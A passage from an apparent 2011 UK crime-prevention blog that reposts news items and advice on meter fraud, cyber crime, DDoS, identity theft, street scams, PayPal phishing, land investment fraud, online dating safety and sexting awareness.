Early work by the ICO suggests that gathering consent by changing settings on browsers may not be sophisticated enough for the demands of the directive.

"They have to think seriously about this," said Mr Graham. "It's going to happen and it's the law."

(8th March 2011)


 

ELECTRICITY SCAM NEST CRIMINALS MILLIONS
(Sky News, dated 4th March 2011 )
http://news.sky.com

Criminals are defrauding the UK energy industry out of electricity worth millions of pounds, a Sky News investigation has revealed.

An estimated 125,000 people have purchased illegal 'top-ups' for their meters from gangs offering electricity at half the price.

Prepay electricity meters work like pay-as-you-go phones. You purchase energy at newsagents and garages by topping-up a plastic 'key'. The key is then plugged into your meter and the amount is added to your account.

But last year hackers cracked the technology used to create engineer's keys that come with £50 credit. Cloned keys have been sold-on to gangs who are using them to top-up meters for £25 cash.

We were tipped-off about 'David', an Albanian operating the fraud in Tottenham. After inviting him to a flat in South London, we secretly filmed him topping-up our meter.

The operation took less than a minute and cost David nothing. We arranged a subsequent meeting with him to purchase the key for £2,000, but he became suspicious and did not keep the appointment.

Consumers purchasing electricity in this way could be caught the next time they top up lawfully.This is because energy suppliers can spot unusual patterns when the correct key isn't used. Anyone caught could end-up being charged twice for their electricity.

Energy UK, the trade association for gas and electricity compaines, estimates the fraud has cost them £10m in sales and that overall losses could rise to £30m after the impact of contacting customers and replacing meters is taken into account.

Director Christine McGourty warned anyone buying an illegal top-up to think again. "These people are criminals," she said. "To commit this crime they have to come into your home and you really don't want to be getting involved with people like that. "We would urge people not to get involved. You're simply putting money in the pockets of criminals."

There are also concerns the cost of the fraud will hit consumers through higher energy bills .

Audrey Gallacher from Consumer Focus said: "All pre-pay meter customers are likely to feel the effects of this. "Action to address the problem, whether through technological fixes or changing meters, will ultimately be borne by consumers."

Despite the fraud being operated in major UK towns and cities, there have been only 16 arrests so far.

(8th March 2011)


 

CYBER CRIME "AS SERIOUS AS TERRORISM"
(The Guardian, dated 2nd March 2011 author Shiv Malik)
www.guardian.co.uk

The UK's economy will suffer "profound effects" if the growing threat of cyber crime is not tackled, warns one of the UK's most senior police officers.

Janet Williams, Deputy Assistant Commissioner of the Metropolitan police and the Association of Chief Police Officers' lead on cyber crime, says online fraudsters and hackers will cause a fall in the value of shares, pensions and business investments if they are not stopped.

The government upgraded cyber crime to a tier one threat in October, putting it on the same level as international terrorism or a flu pandemic. It has set aside £650m to combat the threat.

Williams told the Guardian that £30m of the funding will be used to set up regional e-crime units which will more thoroughly police the "dark side" of the internet.

While larger companies can afford blanket protection from computer criminals, and the national infrastructure receives an "extremely good" protection service, Williams warns that smaller businesses, universities and individuals are still dangerously exposed to criminal rings from around the world looking to steal everything from cash and identities to intellectual property.

"We are very concerned at the extent and growth of cyber crime. It is getting to be an increasingly larger problem," said Williams. "The agencies policing this are bringing all of their skills and capacity to the table to fight this. If we don't, it will have such a profound effect on share prices, on investment, and on how much the government has to spend on pensions. It is big stuff."

A Cabinet Office report released two weeks ago and written in conjunction with private firm Detica, a subsidiary of weapons manufacturer BAE Systems, estimated cyber crime losses at £27bn.

Williams conceded there were real problems with collecting cyber crime data but she said £27bn was a conservative estimate of the losses.

She drew attention to the increasing youth of online fraudsters and her fears that e-criminals, including politically motivated hackers or 'hacktivists', may be too readily sucked into breaking the law because of a lack of human interaction.

An eight-month operation by the police services central e-crime unit, codenamed Pagode, discovered in early 2010 that five British teenagers, including two females, were running the world's largest English-language website for selling stolen identities and credit card details.

The site, Gh0stMarket.net, could only be viewed as lines of computer commands mixed with 'text-speak' English. It had more than 8,000 members. Police estimated £16.2m of financial losses resulted from the 135,000 compromised card numbers found on the site.

Four of the gang were sentenced at Southwark crown court on Wednesday to jail terms of 18 months to five years.

Williams said: "I describe what these very young people were operating as a kind of supermarket for criminals. You had thousands of customers purchasing illicit goods, like packs of stolen identities and instructions for defrauding major organisations. So it was like they came with a shopping trolley in order to load up what they would like. And they got paid quite huge amounts of money for that service."

Williams described the teenagers running the Gh0stMarket site as very bright and very well educated but queried whether they were fully aware of their actions. "[Their age] is very concerning. I wonder whether they completely appreciate the impact of what they've done."

The e-crime unit, which Williams helped establish in 2008, was involved in last month's arrests of three teenagers and two 20-year-olds from the political group Anonymous.

Members of the group are known to have created, and distributed computer software to take down the websites of multinational companies deemed as being hostile towards WikiLeaks.

Drawing a similarity between the Gh0stMarket gang and the Anonymous protesters, Williams said that in both cases the internet had created an "echo-chamber" where individual actions were not readily questioned. This made it easier for young people to get sucked into criminal behaviour.

"If we talk about Anonymous, people were downloading software voluntarily in order to attack another organisation. Allowing your computer to be used in that way is a criminal offence but I'm not sure that people realise that. I think a lot of people thought they were engaged in online protest and didn't appreciate the potential impact on them and the potential of what they were allowing their computers to be used for. If they would have had to have a face-to-face contact conversation, they would have questioned that more," said Williams.

"Human contact gives you thinking time and enables you to question what you are doing. But sometimes these websites almost act like an echo chamber. There is no testing of what you are seeing … It is not an intellectual exchange, it is just download. I think it is quite a dangerous thing."

Williams said she had seen no evidence that cyber criminals operating in different parts of the world were receiving state support.

"Sitting in this seat, I have read the secret intelligence but, in terms of the cyber investigations, very little we have seen has had that link. We have seen a great deal of criminal activity in Russia, Ukraine, eastern Europe but we have absolutely no evidence [that it is state sponsored]."

Williams said the e-crime unit was now returning £21 in "harm return" for every pound invested and had justified the multimillion-pound rise in funding by "proving its business case".

(9th March 2011)


 

CCTV AND ANPR USE UNDER SCRUTINY
(Central office of information, News Distribution Service, dated 2nd March 2011)
http://nds.coi.gov.uk/

A consultation on a new code of practice governing the use of CCTV and Automatic Number Plate Recognition (ANPR) systems has been launched, Crime Prevention Minister James Brokenshire announced yesterday.

Members of the public and operators of these systems can have their say on a range of proposals to make the use of this technology more proportionate and effective. The consultation is the first step towards establishing a formal Code of Practice as promised in the Government's Protection of Freedoms Bill.

The proposals include:

* establishing a checklist of actions to be carried out by CCTV operators before installing new cameras to check whether they are absolutely necessary;

* developing industry standards for equipment to ensure it is reliable, effective and gathers images that are of sufficient quality and in a useable format;

* improving public knowledge about systems in communities through consultation by police and local authorities and better public information; and

* considering whether further guidance is needed on how long data collected by CCTV and ANPR should be retained.

Crime Prevention Minister James Brokenshire said: "CCTV and ANPR systems play a vital role in the prevention and detection of crime. However it is important they are used in a way that does not invade law-abiding people's privacy or undermine the public's confidence in them.

"That's why we are establishing this code and that's why we are asking the public what they think should be in it. Alongside this, we will appoint a new Commissioner to monitor the code and ensure it is effective."

The code would be introduced on an incremental basis, with local authorities and police required to have due regard to it straightaway. The Government will consider whether the code should be extended to other organisations, such as businesses and private security firms, in due course.

(8th March 2011)


 

DDoS - WHAT DOES IT MEAN ?
Category : DDoS
Category : hacking

The following is mainly an extract from an article from  the Webuser magazine dated 10th February 2011 (www.webuser.co.uk)

We have probably heard of the abbreviation before, so what does it mean ?

A DDoS stands for distributed denial of service. It is a malicious attack to bring down a website or a web server by overloading its bandwidth ( the electronic path into the server - so if you overload, it is like putting too many cars on the M25...eventually they will stop). Hackers can launch attacks by remotely instructing a group of infected (zombie) computers, known as a botnet, to repeatedly contact a website or server. This sudden surge in web traffic can cause a website to work slowly or shut down completely. Hackers use malware and Trojan viruses to bring PC's into the botnet. Many people have no idea that their computer has been sabotaged in this way, though they may notice that it doesn't work as well as it used to.

Once a botnet launches a DDoS attack, there's not a lot that the targeted website can do to protect itself. A website can limit the amount of traffic allowed on its server, but this will also restrict legitimate visits. If the origin of the attack can be identified, then the website can contact its ISP and ask it to filter the traffic, but this isn't easy because many infected computers disguise their address.

Most DDoS attacks come from cybercriminal gangs, rogue hackers or countries' secret services. The headline-grabbing potential of DDoS makes it especially effective for activists or hacktivists who want to raise awareness of an issue. Attacks have become increasingly politically motivated.

So what are the the punishments for a DDoS attack ? Well that depends on where the offence took place and we are talking about the worldwide web here! If the perpetrator resides in the UK and the crime affected an organisation within the UK they would be charged under the Computer Misuse Act 1990 (http://www.legislation.gov.uk/ukpga/1990/18/section/1 ). Anyone convicted of a DDoS attack faces a maximum penalty of 10 years in prison or fines of £5,000.

When the media discuss DDoS it is because a large organisation has been affected. The most recent organisations are Visa, Mastercard, Paypal and Amazon. As Visa and Mastercard are the largest credit card companies one can assume that their customers have been affected by the DDoS problem indirectly. But, the shear fact that there are so many computers worldwide that can be taken over remotely to form such an attack is also a concern. Personal security on a computer can cost nothing (see AVG). If your computer has been made a member of a botnet it also means that your personal details ( banking etc ) could also have been hacked and your identity stolen.

(7th March 2011)


IS YOUR IDENTITY AT RISK ?
Category  : Identity theft
Category : fraud

The following is an extract from a quick reference guide leaflet produced by Fellowes and the website www.stop-idfraud.co.uk

Identity Fruad could affect any one of us - from a personal and a business perspective. Finding out that someone has stolen your identity is not just an inconvenience, it can be devastating.

Unfortunately identity theives and organised criminal gangs are continuing to target individuals and businesses - and the latest figures from CIFAS show that once again, ID Fraud is on the increase with the first quarter of 2010 showing a 19.96% increase in the number of victims when compared with the same period of 2009.

So, how can you protect your identity and safeguard your business ? The following provides the basic steps you should be taking, but for a more comprehensive overview and full outline of preventative hints and tips, visit :
www.stop-idfraud.co.uk

How can your identity be stolen ?

With information ! Simply put, criminals can steal your identity by gaining access to personal or confidential information about you or your business and use it to order goods or services, or even take out loans, credit cards or open bank accounts in your or your business's name.

- Through the theft of bags / wallets
- Stealing bank statements and other key information from bins (known as bin raiding).
- Redirecting your post unofficially to another address.
- Sending bogus emails to trick you into providing sensitive information (Phishing)

It could happen to you

From lost wallets to going through your bins, fraudsters are increasingly resourcefull about how they get your information, but for people and companies who fall victim, the outcome is just as devastating regardless of how the information was obtained :

Case study 1

Mr A, aged 40 had £900 taken out of his account by criminals. Mr A suspects that the criminalsgot hold of his details from a number of statements he thres away the week prior to the identity fraud. "After having my identity targeted three times I became very cautious, but now because I shred everything I can throw away my mail with peace of mind. Another thing I have found very useful is to check my credit rating on a regular basis. This way you are made aware of any other addresses or accounts that are linked to you.

Case study 2

Stuart owns company Y. Aged 34, he had a staggering £22,000 stolen through fraudulent means from his business and personal bank accounts two years ago. "I would advise everyone never to use their mother's real maiden name as a security answer, as it is just too difficult to keep it a secret. Use something funny or even stupid, call her Posh Spice or Domestos if you have to."

Top Tips to keep your identity safe

- Keep your personal information, credit cards, passwords and pin numbers in a safe place ( preferably a lockable drawer or safe) and don't share these details with people or companies you don't know.

- Never throw away bills, receipts, credit or debit card slips, bank statements or even unwanted popst without destroying them first, ideally with a cross cut shredder.

- Always protect your post, especially if you live in a building where other people can easily access it. WHen you move house, redirect you mail from your old address to your new one for at least a year.

- Check all your statements and financial records as soon as they arrive and report any discrepancies straight away.

- Regularly obtain a copy of your credit report.

- Be warey of publishing any identifying information about yourself online. In particular things like : phone numbers, pictures of your home, workplace or school, your address, birthday or full name.

- Make sure your computer is protected from the threat of online attacks.

And some extra advice for business

- Register with Companies House and make sure you sign up to their Electronic Filing, PROOF and Monitor services which will help to prevent fraudsters changing the names of your directors and effectively "hijacking" your company.

- Make sure that all your staff are fully informed about the risk of identity fraud. Created a clear set of guideslines and procedures for employees concerning the handling, storage and sharing of sensitive information, both on and off-line.

- Always make suree that you and your staff properly destroy unwanted information. As well as shredding paper, don't forget to shred CD's and always make sure that the information on old computers is wiped clean before throwing them out.

- Always check the identity of your customers. Both business and consumer credit reference agencies offer a wide range of solutions to authenticate and verify the identity of customers to ensure that they exist and are sho they say they are.

- Businesses can now be fined up to £500k for serious breaches of the Data Protection Act.

- Douments which are left on printers and in meeting rooms are liable to be seen by prying eyes. Always clear up after yourself and peoperly dispose of confidential waste.

How to spot if your identity has been stolen

If your car or computer is stolen, it is obvious to spot. But how do you know if someone has stolen your identity ? The signs may not be as clear, but there are some things whcih could indicate you or your company might be a victim :

- you start getting letters of bills in your name from companies with which you are not familiar. For example, bills or receipts for things you haven't bought, a mobile phone in your name whcih you didn't know about or letters regarding outstanding debts which are not yours.

- you stop getting bills or statements or post in general which you normally receive on a regular basis.

- You are refused a financial service, such as a credit card or a loan, despite having a good credit history.

For more information on identity crime, including useful hints, tips and exclusive downloads to help keep your identity safe and to protect your business / employer ; visit : www.stop-idfraud.co.uk


uware note

The information quoted in this extract is relevant and very useful. However, the website (www.stop-idfraud.co.uk) though useful, is cloesly associated with the office equipment manufacturer Fellowes.

(7th March 2011)


HOW NOT TO BE SCAMMED
(BBC News, original article dated 15th June 2010 author Denise Winterman)
www.bbc.co.uk
Category : scam

When it comes down to it all scams are distraction theft. Online scams distract you by making you think that your ID has been compromised and you will loose money. Real time theft such as pickpocketing distract your eyes and bodily senses away from your valuables.

Extract of original article : http://news.bbc.co.uk/1/hi/magazine/8740984.stm

The Squirt

This is also known as the mustard dip, the ketchup dip or the bird poo and like the sting used on Bennett. It's a classic scam which involves thieves getting the attention of their prey by squirting something on them. It can be a white mixture that looks like a pigeon's handiwork on someone's shoulder in the street or tomato ketchup in a cafe.

The scammer then helps their target clean up the mess, offering tissues, and while they do so steal the person's wallet.


The Photo

Another variation of the "distraction" technique. A couple will ask their target to take a photograph of them and proceed to explain how the camera works. While their target is listening they are pick-pocketed by a third person.

They may even put their bag down to take the photo and it is easily snatched. The couple may stick around to "help" the victim. The "helpful" accomplices then offer to call the victim's bank so they can cancel their cards.

The victim proceeds to give her bank details and Pin... only the person on the other end of the line isn't a bank employee at all, but a colleague of the scammers.

The Escalator 

Everyone has a daily routine and good con artists try to tap into that because then your suspicions aren't alerted.

So there you are, minding your own business, about to get off the escalator and the person in front drops their loose change. They are scrabbling to pick it up, you may try to help, it causes a bit of a jam and you have people bumping up behind you as they try to get off.

It quickly becomes a bit of a bundle. As it turns out the person in front and behind you are pickpockets and in the jumble, they have lifted your phone from your bag or pocket.

The shoulder surf

You may think you are being vigilant but thieves are clever. At the cash point you carefully key in you Pin and the amount you want to withdraw, then you feel a tap on the shoulder and the person behind you asks if you have dropped a £10 note lying on the floor.

You take a quick look, maybe impressed by their honesty, say no and turn back. Your money is there, but not your bank card.

The theft is achieved by the "helpful" person memorising your Pin and then distracting you at the precise moment his accomplice grabs the bank card as it is released from the machine. Within minutes, they will be at another cash points withdrawing as much cash as they can from your account. "A good scam manipulates you into acting a certain way, often by helping you.


The good Samaritan

Most people get a warm feeling from helping someone, it makes us feel good about ourselves and con artists prey on that

A chap in Clifton in Bristol walks along the same road every day. Dressed like anyone else, he looks sheepish, carries a petrol can and says that he has run out of petrol and left his wallet at home, and could you please spare him a quid. I could tell this was dodgy a mile off for some reason, I'm fairly switched on, but for fun one time, I gave him a couple of quid... then followed him down the street. Saw him doing it over and over, kept following him, whereupon he deposited the can (after about 30 minutes of walking around) into his car, went into a local pub and started buying drinks. He was even meeting friends of his. A few weeks later I saw him again, smiled to myself and asked him about it. He laughed, wasn't in the least embaressed and said that he does it all the time for his beer money rather than have his missus nag at him! He didn't think it was even vaguely dishonest to lie to people he didn't know about something harmless, and he said he'd been doing it for years and would continue. I chuckled a bit and moved on, slightly shocked that someone so normal would have such a glaring lack of morals.

(7th March 2011)


PAYPAL PHISHING - HAS YOUR ACCOUNT BEEN TEMPORARILY LIMITED ?
(Sophos, dated 7th January 2011 author Graham Cluley)
http://nakedsecurity.sophos.com
Category : spam

Have you received an email, seemingly from PayPal, declaring that your account has been temporarily limited?

Plenty of people have been targeted by an attack which uses the subject line "Your account has been temporarily limited!" and claims to come from what appears to be an offiicial PayPal address.

Well, beware opening the attached reactivation form too quickly because you could be passing your personal information to cybercriminals.

Because the emails are bogus, and the headers are forged - all with the intention of stealing information from you. Here is part of the text (italics) of that we are seeing being spammed out widely right now:

Dear PayPal account holder,

PayPal is constantly working to ensure security by regularly screening the accounts in our system. We have recently determined that different computers have tried logging into your PayPal account,and multiple password failures were present before the logons.

Sounds scary, eh? People on different computers have been trying to log into your PayPal account, and have been guessing at the passwords? Nasty!

Until we can collect secure information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible, and we apologize for the inconvenience.

Those nice folks at PayPal are looking out for you! They've locked down the account because of all the attempted intrusions. Thank goodness!

Download and fill out the form to resolve the problem and then log into your account.

And sure enough, there is a form attached to the email.

But these emails and the form don't really come from PayPal, and entering your confidential information into the form is only going to pass your private data to the cybercriminals behind this spam campaign who will use it to phish your account for money and perhaps steal your identity.

Sophos customers * are proactively protected against this attack. You may not have fallen for it (the lack of graphics in the email body make it look less convincing than some of the PayPal phishing scams we often see) but you may have other loved ones and acquaintances who would be vulnerable to an attack like this.



A WAVE OF PAYPAL PHISHING EMAILS
(Sophos, dated 23rd February 2011 author Graham Cluley)
Category : phishing

Over 200 million people have accounts on PayPal, making it a key target for internet fraudsters attempting to steal money.

One of the way that criminals try to get their hands on your cash is by phishing for your PayPal account details.

An aggressive campaign that we have seen widely spammed out in the last few hours does precisely that, pretending to be a security warning from PayPal.

However, this attack's intention is to trick you into handing over your credit card details, full date of birth and name and address.

If you're ever uncertain whether a message really comes from PayPal or not, visit the real PayPal website and log in as usual. If they really have a security message for you, you'll be able to read it via the PayPal messaging system itself.

* uaware note

It is not just Sophos security software that "filters" out these phishing e mails.

(7th March 2011)


COSMETIC RETAILER LUSH FALLS VICTIM TO HACKERS
(Courtesy of : Computer Active, dated 21st January 2011 author James Temperton )
www.computeractive.co.uk
Category : hackers

The website of the cosmetics company Lush has been hacked, forcing it to be taken offline.

In a statement, the company said it was "still being targeted" by hackers and as a result it had decided to "completely retire" the current version of its website.

Lush also asked customers who placed orders online between 4 October 2010 and 20 January 2011 to contact their banks for advice as their card details "may have been compromised".

The retailer plans to launch a temporary website in the coming days, which will initially only accept payments via Paypal. In a somewhat tongue-in-cheek message to the hackers responsibly, Lush praised their "formidable" talents.

Rik Ferguson, senior security advisor at internet security company Trend Micro, said: "For the most part shopping online is as safe as shopping in store, but when a compromise occurs at an online merchant often its consequences are far greater, affecting many more people than in store card cloning due to the centralised nature of online stores.

"If you feel you may have been affected, contact your bank immediately."

Concerned customers can also contact Lush on 01202 668545 or visit www.lush.co.uk.

(7th March 2011)


LAND INVESTMENT "SCAMS" WARNING
(BBC News, dated 5th march 2011 author Bob Howard)
www.bbc.co.uk
Category : scams

More and more people are being targeted by firms cold-calling them to buy land they say is ripe for development, the BBC has learnt. Many are persuaded to pay tens of thousands of pounds for land which is unlikely ever to be built on. The Financial Services Authority (FSA) said it was investigating about 20 such schemes.

The City of London Police's Economic Crime Directorate said what it had seen so far was the tip of the iceberg.

Pressure selling

William McNaught, from Yorkshire, was contacted by The Property Partnership three years ago and persuaded to pay £101,000 in order to buy eight strips of land in different locations around the UK.

He said he was convinced by the high returns which were promised.

"They were so convincing. The broker told me the investment would achieve a profit of 100-130% in a period of 12 to 18 months," he said.

Radio 4's Money Box has investigated a strip of land Mr McNaught bought near Towcester in Northamptonshire for £10,000 in September 2009.

Instead of being close to development, the land is within the boundaries of the historic Easton Neston Estate and the local council has served further restrictions which mean not even fences or agricultural sheds can be erected.

Planning restrictions

John Townsend, the councillor responsible for planning at South Northamptonshire District Council, said the area was protected to prevent any sort of development.

"It is in open countryside, it is in a conservation area, there are endless reasons why I think it would very unlikely that planning permission would ever be given," he said.

"Nothing can be put here, they cannot put up any fencing, they cannot put up any sheds or huts."

Craig Bees, a director of the local estate agency Bartram and Company, was asked by Money Box to try and value one of Mr McNaught's strips of land. He believes it is worth a fraction of what he paid for it.

"I would describe it as a postage stamp in the middle of a park. It has no access to it and it is too small to build anything meaningful on," he said.

"It has very little or no planning potential. The plot is worth in the order of £75."

Mr McNaught admitted he did not make local enquiries before agreeing to buy the land, something he now bitterly regretted. "I have been foolish and I am now paying the penalty for that foolishness," he said.

The Property Partnership is run by Gavin Gravesande. Money Box asked The Property Partnership to comment on the land it has sold to Mr McNaught but it has not responded.

Regulatory action

The City of London Police's Economic Crime Directorate said Mr McNaught was not alone in having been tricked into handing over large sums in order to buy land which had minimal value.  Detective Chief Inspector David Clarke said this was a growing problem. "There is a significant amount of activity within the law enforcement community ongoing at this point in time to assess how big the problem is. I believe what we are seeing at the moment is only the tip of the iceberg," he said.

The FSA said it had closed down five land investment schemes in the past year in which £42m had been invested. However it can only act if it is able to prove that a firm is effectively running a collective investment scheme in which it promises to liaise with potential developers on behalf of clients.

Jonathan Phelan, head of unauthorized business at the FSA, said the organization was doing its best to clamp down on the problem.  "Where you have a collective investment scheme, we can get involved. We would estimate it to be around at £200m problem. We have got 20 firms under inquiry," he said. "What we are seeing now is much more criminal. They are not even trying, they know they are buying land which will never get planning permission."

He urged anyone who believed they had been a victim to come forward.

"Please, do come to us because there are a dozen, a hundred, a thousand people who are going to come after you and lose similar amounts of money. We really need you to tell us," he said.

(7th March 2011)


NEWS FROM MY SPAM INBOX !
Category : phishing

Apart from the regular adverts for various forms of pharmaceutical paraphernalia, namely Viagra. My Internet Service Providers (ISP) spam filter has done a very good job. In the last 2 weeks it has managed to filter out 10 phishing e mails and place them in a "be warned" post box.

In previous months I received phishing e mails supposedly from Lloyds, Lloyds TSB, NatWest. This time I have received more of a variety. Apart from the well known banks already mentioned, I now have phishing e mails in relation to :

Her Majesty's Revenue and Customs (HMRC) - offering a refund if I supply my banking details.

Liberty Reserve (who?) Well they are the oldest, safest and most popular payment processor operating in Costa Rica and serving millions all around a world. They store your funds privately in gold ! This e mail stated that my online account had been compromised; and that I should renew my password etc, etc.

Egg card - requesting that I re-activate my Egg card using their simple link !

Egg card - requesting that I reset my password as my account has been blocked; using their simple link.

United Parcel Service (UPS) - an e mail stating that a parcel is due for delivery, but to obtain details I would need to open an attachment. Unsolicited e mails with attachments are known to contain malicious software. If someone needs to delivery something to you they would find other means to contact you. Normally if someone did try to leave you a parcel they would have left a "drop-card" to say they had called.

DO NOT reply to any e-mails of this nature, just delete them. If you do have suspicions about the security of your bank or savings account contact the institution immediately direct, NOT via any e mail link or telephone number quoted in such e mail.

If you think you have been CONNED by such an e mail inform you bank or savings institution immediately by telephone and follow it up with a recorded delivery letter. Also inform the "ActionFraud" helpline.

(7th March 2011)


 

LEARNER DRIVERS - DRIVEN TO FAIL
(CSMA* MAGAZINE, dated February 2011 author Shirley Burke)

Thousands of learner drivers failed their tests last year as a reult of being trained by trainee driving instructors - according to the AA. Up to 27,000 trainee-taught learners failed, with a test re-take cost estimated in the region of £1.7 million. Further budget was spent on extra lessons to bring the learners up to test standard.

A trainee instructor has to pass an exam before they can claim to be fully qualified, but with the current pass rate at just 30%, the majority never make the grade or continue with a career in driving instruction. More than one in seven instructors are in the trainee stages, according to the Driving Standards Agency. This figure more than doubled in the last two years to over 7600, possibly as a result of television advertising, encouraging viewers to consider driving instruction as an extra-income, part-time career.

The issue was recently highlighted by the BBC "Rip Off Britain" programme, which exposed well known driving schools for charging students full price for lessons from trainees.

"Most disturbingly, it seems officials no longer even try to track the impact this has on learner drivers," says the AA President, Edmund King. "Now, more than ever, learners must be given an informed choice of instructors.

Driving schools must come clean when they are using trainee instructors to teach young people to drive". Learners should be wary of phrases such as "DSA approved", which does not necessarily mean the instructor has passed the exam. Most pupils admit to being unaware that their instructor is leaning on the job, but it's worth knowing that they are obliged by law to display their qualifications on the windscreen.

A GREEN badge means your instructor is fully qualified and a PINK one they are still a trainee.

Did you know ?

- 153,000 driving tests were taken last year.

- A decade long study has revealed that learners taught be a trainee driving instructor were 25% less likely to pass their test on the first attempt.

- 49% is the percentage of men who passed their test in 2010, compared with a 42.8% success rate for women.

* Civil Service Motoring Association

(7th March 2011)


11th Feb to 5th March. Sorry for the lack of display, but we have been away !

 


ONLINE DATING - A CRIME PREVENTION TOOL
(Police Oracle, dated 11th February 2011 author Cliff Caswell)
www.policeoracle.com

As Valentine's Day approaches, the story of how you met the love of your life always promises to generate plenty of interesting pub conversation - especially if it started with nothing but a name on a screen and a profile.

With the online world and social networking becoming part of the fabric of our lives, relationships are increasingly being formed in cyberspace. No longer do couples have to stumble out their chat-up lines at the nightclub bar, they can reel them off while being continents apart.

The snag is that you could - virtually - be talking to anybody. Behind the avatar and the profile that tells you of beauty, wealth and success can be something distinctly ugly - something that is ugly, in reality, to the point of death.

Online relationships that suddenly turn into a horrifying reality have been echoed through the media for the past decade-and-a-half. Reports of internet meetings ending in assault, rape and worse have filled endless column inches and hours of airtime - a grim warning of the dark side of the web.

Although rare, the risks are certainly genuine and deadly. In 2009, 17-year-old Ashleigh Hall was raped and murdered by Peter Chapman in Sedgefield. The 33-year-old had met the youngster on Facebook, posing as a teenager himself.

Figures from the Metropolitan Police also make for some sobering reading. Last year there were 93 crimes reported that related to "media approaches" on the internet - around double the number from the previous 12 months.

Despite the tragic stories of relationships involving the web, the growth of the online dating industry over the past ten years remains a clear indicator of the popularity of the digital age in our social lives - and there are indications that internet users have become savvy when it comes to protecting themselves.

Geoff Hyams, a former Detective Inspector with the Metropolitan Police, understands the concept of protection. As well as being a veteran officer who has had his fair share of gruesome investigations, he is also the founder of dating website UniformDating.com - a meeting point for members of the UK's uniformed services as well as interested civilians - which launched seven years ago and is approaching around 250,000 subscribers across the country.

The idea for the site came from the 999 parties used by members of the emergency services to meet each other and membership had initially been reserved for unifromed personnel. Its expansion was taken to a new level when it was opened up to the wider civilian community who wanted to date somebody who worked in uniform.

Having spent a large part of his 17-year career working on Major Incident Teams and investigating serious crimes including rape and murder, he maintains that the internet - if treated with the right levels of care and respect - can prove to be one of the safest environments available to set up a date.

"If you look at cases of rape and assault around a traditional 'first date', you find that often the people concerned have no prior knowledge of each other, have met in a pub or club and have had a few drinks before the encounter," he said.

"There have been cases that I have investigated where - had the victim had the ability to check out the person they were going to meet - the incident would have been avoided.

"With the internet, you have time to put in place layers of security. You can build in some sensible measures to reduce the likelihood of becoming a victim, as well as satisfying yourself that the person you are going to meet is who they say they are."

Hyams points out that all other real-world precautions of dating - such as meeting in a public place and ensuring a taxi home is pre-booked - are vital disciplines. Most people, he maintains, use the internet as a pre-meeting tool.

He said: "With the likes of police officers using our site, we have a very keen awareness of safety and have produced a list of tips for online dating safety - this is available to anyone regardless of whether they want to be a member, which you can now access via a Safety Advice button on the website.

"You have to remember that there is a PlayStation generation who have grown up with the internet and they are entirely comfortable with using the technology," he added. "In particular you find that teens and those in their early 20s have a healthy wariness about the information they exchange online."

Jacqui Hames, a former Detective Constable with the Met who presented the appeals section of the BBC Crimewatch show for 16 years, believes the internet must be treated with respect.

The ex-officer, who co-wrote the book Savvy: A Modern Girl's Guide to Doing It All Without Risking It All with the show's presenter Fiona Bruce, believes that anyone tempted by online dating must find out as much as possible about their would-be match - and take all sensible precautions when meeting.

"The fact is that, unless you go on a blind date, you are generally likely to know the person you are meeting in some way beforehand," she said. "But in an online environment anyone can write anything about themselves, so the first piece of advice is to determine if the person you are meeting is who they say they are.

"If you do decide to set up a date, you should make sure that you are in a public place and make arrangements to get there and leave under your own steam. You should also give details of where you are meeting to a friend, text them on your return and offer to pay for your own food and drink."

In Savvy, Hames also sets out some useful guidance about establishing whether a dating website is legitimate - establishing whether it looks professionally produced and making sure it has a proper terms of use page.

But the former officer - who has teenage daughter - acknowledges that common sense can go out of the window when people are caught up in the emotions of a date.

"Setting up a date with somebody you do not know can present difficulties because you are trying to open up emotionally to them," she added. "You need to have a clear checklist of what you are doing and stick to it."

Det Supt Caroline Bates, Operational Commander in Charge of the Met's Operation Sapphire - which specialises in investigating rape and sexual assault cases as well as providing victims with the support they need - agreed that a common sense approach to dating is required, particularly in the online environment.

"The issue is that people tend to feel safe on the internet because they are in their own front room - they relax and put their guard down and accept what the person in front of them has told them is true," the officer said. "What you have to remember is that it could be somebody completely different.

"I think most websites have some form of advice and guidance now - I would like to see that displayed a bit more prominently - but the main point is that people should not make assumptions and maintain their awareness. Some people do this for the first few times but then let their guard down."

Despite concerns about dating online, Bates accepts that social media is now naturally integrated into the lives of the vast majority of people. She said people need to make sure they apply the same levels of security to their online behaviour as in the real world.

"You need to be cautious about presenting too much personal information," she said. "And you need to take precautions if you decide to meet. If possible, don't go on your own. But if you do go by yourself make sure somebody knows where you have gone and who you are meeting - it is all about staying safe, but if you do become a victim make sure you report it to the police."

Out on a date or out alone, stay safe : www.met.police.uk/sapphire/staying_safe.htm
Dating - what do the Police do ! : http://www.uniformdating.com/misc/general_safety_advice.html

(11th February 2011)


 

CEOP SAYS "THINK BEFORE YOU SEND"
(News Distribution Service, Central Office of Information, dated 8th February 2011)
http://nds.coi.gov.uk

"Think before you send" is the message from the Child Exploitation and Online Protection (CEOP) Centre - the UK's national centre for protecting children - as it marks EU Safer Internet Day 2011 to talk about the dangers young people face when sending indecent images of themselves to each other, often called 'sexting'.

This is in response to increasing evidence that such images are being shared with wider groups of friends. Research from Beatbullying highlighted that 38% of 11-17 year olds have received a sexually explicit or distressing text or email, with 70% admitting they knew the sender. Young people often do not realise that by digitally sharing such images, they may lose control and may never really know where it ends up. In some extreme cases, CEOP has found these in the collection of child sex offenders and their networks.

To support this message and Safer Internet Day, which falls on Tuesday 8 February, CEOP has launched a brand new resource called "Exposed"; a ten minute film aimed at 11-16 year olds, encouraging them to think about their actions and how these may affect others and their lives in future. Together with lessons plans and accompanying activities, the film has been produced in consultation with leading charities and education practitioners and is available free of charge at www.thinkuknow.co.uk/teachers.

Peter Davies, Chief Executive of the CEOP Centre says: "We know that young people are increasingly using technology not only to stay in touch, but to explore their sexuality and to push the boundaries in what they send and to whom they send it. It is now so easy to send pictures instantly via emails and texts that we are seeing instances of boys or girls sending sexual images of themselves to others without considering the consequences. They often find out later that the image has been passed on to many others and as a result they can be the victims of bullying or harassment.

"In some rare instances we have seen these images end up in the collections of offenders. It is important that we look to raise awareness of this risk by launching new resources into our established education programme Thinkuknow so that young people can make the right choices".

Minister for Crime Prevention James Brokenshire said: "Child protection will always be an absolute priority for Government and CEOP continues to play a crucial role in ensuring children are safeguarded.

"This is a worrying trend. We should encourage young people to use technology but it's really important that they are made aware of the dangers involved too.

"I welcome this new campaign which will help to raise awareness of the risks and educate young people about staying safe online."

